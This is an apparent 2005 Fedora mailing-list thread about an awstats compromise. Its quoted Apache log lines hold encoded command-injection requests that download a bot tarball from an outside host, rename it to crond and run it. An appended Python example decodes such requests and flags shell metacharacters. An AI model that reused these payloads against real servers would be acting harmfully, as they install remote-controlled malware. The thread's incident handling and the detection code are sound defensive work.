Security Breach
David Cary Hart
Fedora at TQMcube.com
Fri Mar 4 17:39:44 UTC 2005
On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
> >
> > "GET
> > /cgi-bin/awstats.pl?
> > configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2
> > 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta
> > r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec
> > ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
> >
> > "GET
> > /cgi-bin/awstats.pl?
> > configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi
> > lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20
> > psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%
> > 2500 HTTP/1.1" 200 634 "-" "-"
> >
> >
> > -cs
>
> Thank you for this report.
> So you are saying that even with awstats 6.4 you got compromised as
> Apache did execute the logged command and a trojan then started running
> located in /tmp? If so, would you please be so kind and report that
> issue to the awstats project guys as soon as possible?
Alexander:
Could you explain the series of events? It's not clear - to me - how
this resulted in a compromised machine.
BTW, I am MOST appreciative of people who follow up on their issues as
Chris did.
Thanks
--
Total Quality Management - A Commitment to Excellence
Fight Spam: http://www.tqmcube.com/rbldnsd.htm
Real Time Updates: rsync -t \
tqmcube.com::spamlists/[README.htm][clients][dynamic][relays][asiaspam]
http://www.tqmcube.com/spam_trap.htm
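
Added example, not part of the original message: one way to decode requests like the ones quoted above and flag query parameters that carry shell metacharacters once the percent-encoding (including the double-encoded `%2500`) is removed. It assumes Apache combined log format; the sample lines are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (Apache combined log format, documentation IPs).
# Line 1 mirrors the shape of the quoted request with the download steps left out.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Mar/2005:10:00:00 +0000] "GET /cgi-bin/awstats.pl?'
    'configdir=%7cecho%20%3becho%20b_exp%3becho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"',
    '192.0.2.11 - - [04/Mar/2005:10:00:05 +0000] "GET /cgi-bin/awstats.pl?'
    'config=example.org&configdir=/etc/awstats HTTP/1.1" 200 9120 "-" "-"',
    '192.0.2.12 - - [04/Mar/2005:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "-"',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) ')
# Characters that have special meaning to a shell, plus NUL (seen here as %2500).
SHELL_META = set('|;&`$<>\n\x00')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded bytes are revealed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return [(param, decoded_value, http_status)] for values with shell metacharacters."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    target, status = match.group(1), int(match.group(2))
    hits = []
    # parse_qsl splits on '&' first and then decodes each value once.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(value)
        if SHELL_META & set(value):
            hits.append((name, value, status))
    return hits


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, value, status in suspicious_params(line):
            print(f"status={status} param={name} decoded={value!r}")
```

A 200 status on a flagged line only shows that the script answered, not that the embedded command ran; it marks the request for follow-up on the host.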